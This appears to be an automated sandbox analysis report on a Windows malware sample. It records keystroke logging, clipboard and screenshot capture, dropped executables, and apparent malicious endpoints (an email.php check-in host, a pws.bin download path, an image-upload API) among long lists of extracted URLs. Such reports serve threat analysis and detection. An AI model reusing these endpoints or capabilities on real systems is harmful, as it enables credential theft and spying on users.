Analysis Report

Overview

General Information

Analysis ID:	83448
Start time:	18:51:42
Start date:	07/09/2015
Overall analysis duration:	0h 2m 49s
Report type:	full
Sample file name:	40D19FBA73C6B011814E2C6920E8792F (renamed file extension from none to exe)
Cookbook file name:	Simulate.jbs
Analysis system description:	Windows 7 (Office 2003 SP1, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 41, Firefox 36)
Number of analysed new started processes analysed:	17
Number of new started drivers analysed:	1
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
HCA enabled:	true
HCA success:	true, ratio: 59% Number of executed functions: 143 Number of non-executed functions: 458
Cookbook Comments:	Simulate keyboard
Warnings:	Show All Exclude process from analysis (whitelisted): mscorsvw.exe, spsys.sys, WmiPrvSE.exe, sppsvc.exe, WmiApSrv.exe, dllhost.exe Execution Graph export aborted for target FB_390E.tmp.exe, PID 3560 because it has too many nodes Report size exceeded maximum capacity and may have missing behavior information. Report size exceeded maximum capacity and may have missing disassembly code. Report size getting too big, too many NtCreateSection calls found. Report size getting too big, too many NtEnumerateKey calls found. Report size getting too big, too many NtQueryValueKey calls found. Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi) for: FB_3804.tmp.exe, FB_3449.tmp.exe

Detection

Strategy	Score	Range	Reporting	Detection
Threshold	100	0 - 100	Report FP / FN

Analysis Advice

Sample drops PE files which have not been started, submit dropped PE samples for a secondary analysis to Joe Sandbox

Sample has functionality to log and monitor keystrokes, analyze it with the keystroke simulation cookbook

Sample sleeps for a long time, analyze it with the fake sleep cookbook

Signature Overview

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider

Show sources

Source: C:\Program Files\Internet Explorer\iexplore.exe

Code function: 11_2_0045D334 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext,

11_2_0045D334

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality to read the clipboard data

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_00422C80 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,

2_2_00422C80

Contains functionality to record screenshots

Show sources

Source: C:\40D19FBA73C6B011814E2C6920E8792F.exe

Code function: 2_2_004232C4 GetObjectA,GetDC,CreateCompatibleDC,CreateBitmap,CreateCompatibleBitmap,GetDeviceCaps,GetDeviceCaps,SelectObject,GetDIBColorTable,GetDIBits,SelectObject,CreateDIBSection,GetDIBits,SelectObject,SelectPalette,RealizePalette,FillRect,SetTextColor,SetBkColor,SetDIBColorTable,PatBlt,CreateCompatibleDC,SelectObject,SelectPalette,RealizePalette,SetTextColor,SetBkColor,BitBlt,SelectPalette,SelectObject,DeleteDC,SelectPalette,

2_2_004232C4

Contains functionality to retrieve information about pressed keystrokes

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe

Code function: 5_2_00438204 GetKeyboardState,

5_2_00438204

Software Vulnerablities:

Found inlined nop instructions (likely shell or obfuscated code)

Show sources

Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 4x nop then ret	5_2_0045B794
Source: C:\Users\admin\AppData\Local\Temp\FB_3449.tmp.exe	Code function: 4x nop then ret	5_1_0045B794
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 4x nop then ret	6_2_0045B794
Source: C:\Users\admin\AppData\Local\Temp\FB_3804.tmp.exe	Code function: 4x nop then ret	6_1_0045B794
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 4x nop then ret	7_2_0045B794
Source: C:\Users\admin\AppData\Local\Temp\FB_390E.tmp.exe	Code function: 4x nop then ret	7_1_0045B794
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 4x nop then ret	12_2_0045B794
Source: C:\Users\admin\AppData\Roaming\Java\java.exe	Code function: 4x nop then ret	12_1_0045B794

Networking:

Urls found in memory or binary data

Show sources

Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: file://
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: file:///
Source: iexplore.exe	String found in binary or memory: file:///c:/jbxinitvm.au3
Source: iexplore.exe	String found in binary or memory: file:///c:/jbxinitvm.au303n
Source: iexplore.exe	String found in binary or memory: file:///c:/program%20files/adobe/reader%2011.0/reader/legal/enu/license.html
Source: iexplore.exe	String found in binary or memory: file:///c:/program%20files/adobe/reader%2011.0/reader/legal/enu/license.htmlo
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/app
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/app7
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local
Source: iexplore.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/microsoft/windows%20mail/account%7b4b6bed03-465b-4aac-a259-44e3
Source: iexplore.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/microsoft/windows%20mail/account%7bdcb07aab-50cd-41d4-8654-aeda
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/t_
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/aforge.video.directshow/aforge.video.directshow.exe
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/en/248.resources/248.resources.exe/temp/en-us/248.resource
Source: FB_3449.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/fb_3449.tmp.exe
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/fb_3804.tmp.exe
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/fb_3804.tmp.exep
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/g
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/hookwrap
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/lzma/lzma.exeh-
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/nkisxonhrnbshpdnlckygsrszor/nkisxonhrnbshpdnlckygsrszor.ex
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/local/temp/o-
Source: FB_3449.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/roaming/java/java.exe
Source: FB_3449.tmp.exe	String found in binary or memory: file:///c:/users/admin/appdata/roaming/java/java.exegs
Source: FB_3449.tmp.exe	String found in binary or memory: file:///c:/windows/assemblb/2.0.0.0__b77a5c561934e089/mscorlib.dll
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/windows/assembly/gac_msil/microsoft.visualbasic/8.0.0.0__b03f5f7f11d50a3a/microsoft.visua
Source: FB_3804.tmp.exe	String found in binary or memory: file:///c:/windows/microsoft.net/framework/v2.0.50727/
Source: iexplore.exe	String found in binary or memory: file://192.168.1.2/all/disable%20failure.au3
Source: FB_3449.tmp.exe	String found in binary or memory: ftp://
Source: FB_3449.tmp.exe	String found in binary or memory: ftp://ftp.host.comh
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://
Source: iexplore.exe	String found in binary or memory: http://127.0.0.1:49264/mainwindow.html3p
Source: iexplore.exe	String found in binary or memory: http://127.0.0.1:49264/mainwindow.htmllmemp
Source: iexplore.exe	String found in binary or memory: http://127.0.0.1:49264/mainwindow.htmlm/
Source: iexplore.exe	String found in binary or memory: http://127.0.0.1:49316/mainwindow.htmlionp
Source: iexplore.exe	String found in binary or memory: http://127.0.0.1:49316/mainwindow.htmlm4
Source: iexplore.exe	String found in binary or memory: http://ams1.ib.adnxs.com/if?e=wqt_3qkkbkgbagaaagdwaauio8vkqauq4fjnl9fy6bsagp3u5m23s7zsbiabki0jaaaabq
Source: iexplore.exe	String found in binary or memory: http://ams1.ib.adnxs.com/ifpve
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.comodo.net/utn-userfirst-hardware.crl0q
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.comodoca.com/comodorsacertificationauthority.crl0q
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.comodoca.com/comodorsaorganizationvalidationsecureserverca.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.comodoca.com/utn-userfirst-hardware.crl06
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccerlisca2011_2011-03-29.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microoceraut_2010-06-23.crl0z
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl0t
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.pkioverheid.nl/domorganisatielatestcrl-g2.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.pkioverheid.nl/domovlatestcrl.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.usertrust.com/addtrustexternalcaroot.crl05
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.usertrust.com/utn-userfirst-object.crl0)
Source: FB_3449.tmp.exe	String found in binary or memory: http://crl.verisign.com/pca3.crl0
Source: iexplore.exe	String found in binary or memory: http://crl3.digicert.com/digicerthighassuranceevrootca.crl0
Source: iexplore.exe	String found in binary or memory: http://crl4.digicert.com/digicerthighassuranceevrootca.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://crt.comodoca.com/comodorsaaddtrustca.crt0$
Source: FB_3449.tmp.exe	String found in binary or memory: http://crt.comodoca.com/comodorsaorganizationvalidationsecureserverca.crt0$
Source: FB_3449.tmp.exe	String found in binary or memory: http://crt.comodoca.com/utnaddtrustserverca.crt0$
Source: FB_3449.tmp.exe	String found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: iexplore.exe	String found in binary or memory: http://degreat.host56.com/email.php
Source: iexplore.exe	String found in binary or memory: http://degreat.host56.com/email.php?action=checkn
Source: iexplore.exe	String found in binary or memory: http://degreat.host56.com/email.php?action=checkp
Source: iexplore.exe	String found in binary or memory: http://g.symcb.com/crls/gtglobal.crl0.
Source: iexplore.exe	String found in binary or memory: http://g.symcd.com0
Source: FB_3449.tmp.exe	String found in binary or memory: http://galaxysproducts.com/pws/pws.bin)failed
Source: FB_3449.tmp.exe	String found in binary or memory: http://galaxysproducts.com/testpanelh
Source: iexplore.exe	String found in binary or memory: http://go.microsoft.com/fwlink/
Source: notepad.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=125824-http://go.microsoft.com/fwlink/?linkid=125723-http://g
Source: iexplore.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=299201
Source: iexplore.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=69157
Source: iexplore.exe	String found in binary or memory: http://go.microsoft.com/fwlink/?linkid=92362.
Source: FB_3449.tmp.exe	String found in binary or memory: http://ip4.teliz
Source: FB_3449.tmp.exe	String found in binary or memory: http://ip4.telize.com
Source: FB_3449.tmp.exe	String found in binary or memory: http://ip4.telize.com/
Source: iexplore.exe	String found in binary or memory: http://java.com/en/download/installed8.jsp
Source: iexplore.exe	String found in binary or memory: http://java.com/verify9/03n
Source: iexplore.exe	String found in binary or memory: http://java.com/verify9/?src=installx
Source: FB_3449.tmp.exe	String found in binary or memory: http://logo.verisign.com/vslogo.gif0
Source: FB_3449.tmp.exe	String found in binary or memory: http://microsoft.com0
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.comodoca.com0
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.comodoca.com0%
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.comodoca.com0-
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.comodoca.com0/
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.comodoca.com05
Source: iexplore.exe	String found in binary or memory: http://ocsp.digicert.com0m
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.entrust.net03
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.entrust.net0d
Source: FB_3449.tmp.exe	String found in binary or memory: http://ocsp.usertrust.com0
Source: iexplore.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.html?show_screen_name=false&screen_name=msnde&show
Source: iexplore.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.htmlount=fqpc
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://schemas.microsoft.com/.netconfiguration/v2.0
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://schemas.microsoft.com/clr/
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://schemas.microsoft.com/clr/assem/
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://schemas.microsoft.com/clr/ns/
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://schemas.microsoft.com/clr/nsassem/
Source: iexplore.exe	String found in binary or memory: http://static
Source: iexplore.exe	String found in binary or memory: http://static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.js?version=41
Source: iexplore.exe	String found in binary or memory: http://static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.jssz%3
Source: iexplore.exe	String found in binary or memory: http://stats.hosting24.com/count.php
Source: FB_3449.tmp.exe	String found in binary or memory: http://uploads.im/api?upload
Source: iexplore.exe	String found in binary or memory: http://www.000webhost.com/
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/search
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/searchtm
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/widget/render/flex/?h=90px&w=100pc&f=bwvolc&t=videos2~l%3dhorizontalcarouselvide
Source: iexplore.exe	String found in binary or memory: http://www.bing.com/widget/render/flex/p
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: iexplore.exe	String found in binary or memory: http://www.digicert.com/cacerts/digicerthighassuranceevrootca.crt0
Source: iexplore.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php9
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php?
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.facebook.com%2fwindows&locale=en_us&w
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php?locale=de_de&href=https%3a%2f%2fwww.facebook.com%2fmsn.deut
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.phparbiter/6dg4olkbbyq.jsjs-sind-heimlich-depressiv/ar-aaacgh2
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.phpp
Source: iexplore.exe	String found in binary or memory: http://www.google.com
Source: FB_3804.tmp.exe	String found in binary or memory: http://www.iptrackeronline.com/
Source: iexplore.exe	String found in binary or memory: http://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/vie9
Source: iexplore.exe	String found in binary or memory: http://www.microsoft.com/en-us/ie-firstrun/win-7/ie-11/viehp1
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/miccerlisca2011_2011-03-29.crt0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/miccertrulispca_2009-04-02.crt0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/microoceraut_2010-06-23.crt07
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.microsoft.com/pki/certs/microsoftrootcert.crt0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.microsoft.com/pki/crl/products/miccertrulispca_2009-04-02.crl
Source: iexplore.exe	String found in binary or memory: http://www.msn.com/
Source: iexplore.exe	String found in binary or memory: http://www.msn.com/?ocid=iehp-2
Source: iexplore.exe	String found in binary or memory: http://www.msn.com/de-de/03n
Source: iexplore.exe	String found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
Source: iexplore.exe	String found in binary or memory: http://www.msn.com/de-de/finanzen/top-stories/zehntausende-deutsche-sind-heimlich-depressiv/ar-aaacg
Source: iexplore.exe, 9567.enc.3608.dr	String found in binary or memory: http://www.nuclearwintercrew.com
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.public-trust.com/cgi-bin/crl/2018/cdp.crl0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.public-trust.com/cps/omniroot.html0
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.user
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.usert.co
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.usertrust.com1
Source: iexplore.exe	String found in binary or memory: http://www.verisign.com
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#base64
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#dsa-sha1
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#enveloped-signature
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#rsa-sha1
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2000/09/xmldsig#sha1
Source: iexplore.exe	String found in binary or memory: http://www.w3.org/2000/xmlns/
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#hmac-ripemd160h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#hmac-sha256h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#hmac-sha384h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#hmac-sha512
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#md5h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmldsig-more#sha384h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#aes128-cbch
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#aes192-cbch
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#aes256-cbch
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#des-cbch
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#kw-aes128h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#kw-aes192h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#kw-aes256h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#kw-tripledesh
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#ripemd160h
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#sha256
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#sha512
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/04/xmlenc#tripledes-cbch
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/10/xml-exc-c14n#
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2001/10/xml-exc-c14n#withcomments
Source: iexplore.exe	String found in binary or memory: http://www.w3.org/2001/xmlschema
Source: iexplore.exe	String found in binary or memory: http://www.w3.org/2001/xmlschema-instance
Source: iexplore.exe	String found in binary or memory: http://www.w3.org/2001/xmlschema-instanceu
Source: iexplore.exe	String found in binary or memory: http://www.w3.org/2001/xmlschemahatl.
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/2002/07/decrypt#xml
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/tr/1999/rec-xpath-19991116
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/tr/1999/rec-xslt-19991116
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/tr/2001/rec-xml-c14n-20010315
Source: FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/tr/2001/rec-xml-c14n-20010315#withcomments
Source: FB_3804.tmp.exe, FB_3449.tmp.exe	String found in binary or memory: http://www.w3.org/xml/1998/namespace
Source: iexplore.exe	String found in binary or memory: https://get.adobe.com/flashplayer/completion/aih/
Source: iexplore.exe	String found in binary or memory: https://get.adobe.com/flashplayer/completion/aih/?exitcode=0&re=0&type=install&appid=200d=200
Source: iexplore.exe	String found in binary or memory: https://login.live.com/lo
Source: iexplore.exe	String found in binary or memory: https://login.live.com/login.srf
Source: iexplore.exe	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=12&checkda=1&ct=1427459848&rver=6.1.6195.0&wp=&
Source: iexplore.exe	String found in binary or memory: https://login.live.com/login.srf?wa=wsignin1.0&rpsnv=12&checkda=1&ct=1427711392&rver=6.1.6195.0&wp=&
Source: iexplore.exe	String found in binary or memory: https://lv
Source: iexplore.exe	String found in binary or memory: https://s-static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.js?version=418
Source: iexplore.exe	String found in binary or memory: https://s-static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.jsk.face
Source: FB_3449.tmp.exe	String found in binary or memory: https://secure.comodo.com/cps0
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=132970837947&domain=www.msn.com&origin=1&redirect_ur
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=544580382313562&domain=www.msn.com&origin=1&redirect
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/plugins/comments.php
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/plugins/comments.php?api_key=544580382313562&channel_url=http%3a%2f%2fstati
Source: FB_3449.tmp.exe	String found in binary or memory: https://www.verisign.com/cps04
Source: FB_3449.tmp.exe	String found in binary or memory: https://www.verisign.com/repository/cps
Source: FB_3449.tmp.exe	String found in binary or memory: https://www.verisign.com/repository/verisignlogo.gif0d
Source: FB_3449.tmp.exe	String found in binary or memory: https://www.verisign.com/rpa0
Source: FB_3449.tmp.exe	String found in binary or memory: https://www.verisign.com;

Downloads files from webservers via HTTP

Show sources

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1 Host: ip4.telize.com Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /email.php?action=check HTTP/1.1 User-Agent: MSIE 7.0 Host: degreat.host56.com Cache-Control: no-cache

Found strings which match to known social media urls

Show sources

Source: iexplore.exe	String found in binary or memory: mit Hotmail Nachfolger Outlook und Messenger Skype equals www.hotmail.com (Hotmail)
Source: iexplore.exe	String found in binary or memory: "://www.facebook.com/connect/ping?client_id=132970837947&domain=www.msn.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6Dg4oLkBbYq.js%3Fversion%3D41%23cb%3Df1b1681c8e29d1f%26domain%3Dwww.msn.com%26origin%3Dhttp%253A%252F%252Fwww.msn.com%252Ff14b2bcd2c4031a%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joeyLMEM equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: (http://www.facebook.com/plugins/like.phparbiter/6dg4olkbbyq.jsjs-sind-heimlich-depressiv/ar-aaacgh2 equals www.facebook.com (Facebook)
Source: FB_3449.tmp.exe	String found in binary or memory: .yahoo.com0 equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: C:\Program Files\Mozilla Firefox\e=de_DE&href=https%3A%2F%2Fwww.facebook.com%2Fmsn.deutschland&send=false&layout=button_count&width=450&show_faces=false&font&colorscheme=light&action=like&height=21nss equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: Visited: admin@https://www.facebook.com/connect/ping?client_id=544580382313562&domain=www.msn.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6Dg4oLkBbYq.js%3Fversion%3D41%23cb%3Df270617c712a17%26domain%3Dwww.msn.com%26origin%3Dhttp%253A%252F%252Fwww.msn.com%252Ff2aa9a05d4366ea%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joeyLMEM equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: Yahoo equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.html?show_screen_name=false&screen_name=msnde&show_count=false&lang=de equals www.twitter.com (Twitter)
Source: iexplore.exe	String found in binary or memory: http://platform.twitter.com/widgets/follow_button.htmlount=fQpc equals www.twitter.com (Twitter)
Source: iexplore.exe	String found in binary or memory: http://static.ak.facebook.com/connect/xd_arbiter/6Dg4oLkBbYq.js?version=41 equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.jssz%3 equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php9 equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php?href=http%3a%2f%2fwww.facebook.com%2fwindows&locale=en_US&width=227&show_faces=false&send=false&layout=button_count&action=like&colorscheme=light&font=segoe+ui equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.php?locale=de_DE&href=https%3A%2F%2Fwww.facebook.com%2Fmsn.deutschland&send=false&layout=button_count&width=450&show_faces=false&font&colorscheme=light&action=like&height=21h equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: http://www.facebook.com/plugins/like.phpP equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://s-static.ak.facebook.com/connect/xd_arbiter/6Dg4oLkBbYq.js?version=418 equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://s-static.ak.facebook.com/connect/xd_arbiter/6dg4olkbbyq.jsk.face equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=132970837947&domain=www.msn.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6Dg4oLkBbYq.js%3Fversion%3D41%23cb%3Df1b1681c8e29d1f%26domain%3Dwww.msn.com%26origin%3Dhttp%253A%252F%252Fwww.msn.com%252Ff14b2bcd2c4031a%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/connect/ping?client_id=544580382313562&domain=www.msn.com&origin=1&redirect_uri=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6Dg4oLkBbYq.js%3Fversion%3D41%23cb%3Df270617c712a17%26domain%3Dwww.msn.com%26origin%3Dhttp%253A%252F%252Fwww.msn.com%252Ff2aa9a05d4366ea%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/plugins/comments.php equals www.facebook.com (Facebook)
Source: iexplore.exe	String found in binary or memory: https://www.facebook.com/plugins/comments.php?api_key=544580382313562&channel_url=http%3A%2F%2Fstatic.ak.facebook.com%2Fconnect%2Fxd_arbiter%2F6Dg4oLkBbYq.js%3Fversion%3D41%23cb%3Df5f6f50a62e71d%26domain%3Dwww.msn.com%26origin%3Dhttp%253A%252F%252Fwww.msn.com%252Ff2aa9a05d4366ea%26relation%3Dparent.parent&colorscheme=light&href=http%3A%2F%2Fwww.msn.com%2Fde-de%2Ffinanzen%2Ftop-stories%2Fzehntausende-deutsche-sind-heimlich-depressiv%2Far-AAacgh2&locale=de_DE&numposts=10&order_by=social&sdk=joey&skin=light&width=100%25 equals www.facebook.com (Facebook)
Source: FB_3449.tmp.exe	String found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: FB_3449.tmp.exe	String found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: iexplore.exe	String found in binary or memory: nted: admin@http://www.facebook.com/plugins/like.php? equals www.facebook.com (Facebook)
Source: FB_3449.tmp.exe	String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
